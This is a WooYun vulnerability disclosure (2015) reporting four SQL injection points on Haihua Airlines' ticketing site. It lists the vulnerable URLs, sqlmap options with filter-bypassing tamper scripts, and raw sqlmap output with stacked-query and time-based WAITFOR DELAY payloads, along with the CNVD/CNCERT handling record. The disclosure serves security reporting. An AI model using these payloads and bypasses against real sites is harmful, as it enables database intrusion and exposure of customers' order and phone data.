当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121965

漏洞标题:海华航空售票系统多处SQL注入漏洞(泄露机票火车票用户手机订单信息等)

相关厂商:海华航空

漏洞作者: 路人甲

提交时间:2015-06-25 14:26

修复时间:2015-08-13 18:22

公开时间:2015-08-13 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

有没有修复完全的,有通过tamper绕过的,有没有提交过的!~~~

详细说明:

1、第一处

http://www.h-h.com.cn/visa/visa_list.aspx?s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81&key=12


加上参数 --dbms "Microsoft SQL Server 2005" --threads 10 --tamper between.py,randomcase.py,space2comment.py

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


2、第二处

http://www.h-h.com.cn/Hotel/SearchList.aspx?CityCode=SHA&CheckInDate=2015-06-24&CheckOutDate=2015-06-29&HotelName=1&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=12&Rank=&MinPrice=&MaxPrice=


1.jpg


2.jpg


3、第三处

http://www.h-h.com.cn/view_news.aspx?id=20


没有修复完全,可tamper继续注入

1.jpg


加上参数 --dbms "Microsoft SQL Server 2005" --threads 10 --tamper between.py,randomcase.py,space2comment.py

2.jpg


3.jpg


4、第四处

http://www.h-h.com.cn/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc


加上参数 --dbms "Microsoft SQL Server 2005" --threads 10 --tamper between.py,randomcase.py,space2comment.py

sqlmap identified the following injection points with a total of 2408 HTTP(s) re
quests:
---
Place: GET
Parameter: stype
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: stype='; WAITFOR DELAY '0:0:5'--&ptype=&ddw=1&sdate=2015-3-17&edate
=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&so
rd=desc
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: stype=' WAITFOR DELAY '0:0:5'--&ptype=&ddw=1&sdate=2015-3-17&edate=
2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sor
d=desc
Place: GET
Parameter: sdate
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: stype=&ptype=&ddw=1&sdate=2015-3-17'); WAITFOR DELAY '0:0:5'--&edat
e=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&s
ord=desc
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: stype=&ptype=&ddw=1&sdate=2015-3-17') WAITFOR DELAY '0:0:5'--&edate
=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&so
rd=desc
Place: GET
Parameter: ptype
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: stype=&ptype='; WAITFOR DELAY '0:0:5'--&ddw=1&sdate=2015-3-17&edate
=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&so
rd=desc
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: stype=&ptype=' WAITFOR DELAY '0:0:5'--&ddw=1&sdate=2015-3-17&edate=
2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sor
d=desc
Place: GET
Parameter: edate
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17'); WAITFOR DELA
Y '0:0:5'--&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&s
ord=desc
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17') WAITFOR DELAY
 '0:0:5'--&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&so
rd=desc
---
[17:11:20] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: stype, type: Single quoted string (default)
[1] place: GET, parameter: ptype, type: Single quoted string
[2] place: GET, parameter: sdate, type: Single quoted string
[3] place: GET, parameter: edate, type: Single quoted string
[q] Quit
> 0
[17:12:01] [INFO] testing Microsoft SQL Server
[17:12:01] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[17:12:08] [INFO] confirming Microsoft SQL Server
[17:12:18] [INFO] adjusting time delay to 3 seconds due to good response times
[17:12:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005


漏洞证明:

如上

修复方案:

过滤修复,你懂!~~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-29 18:21

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.

最新状态:

暂无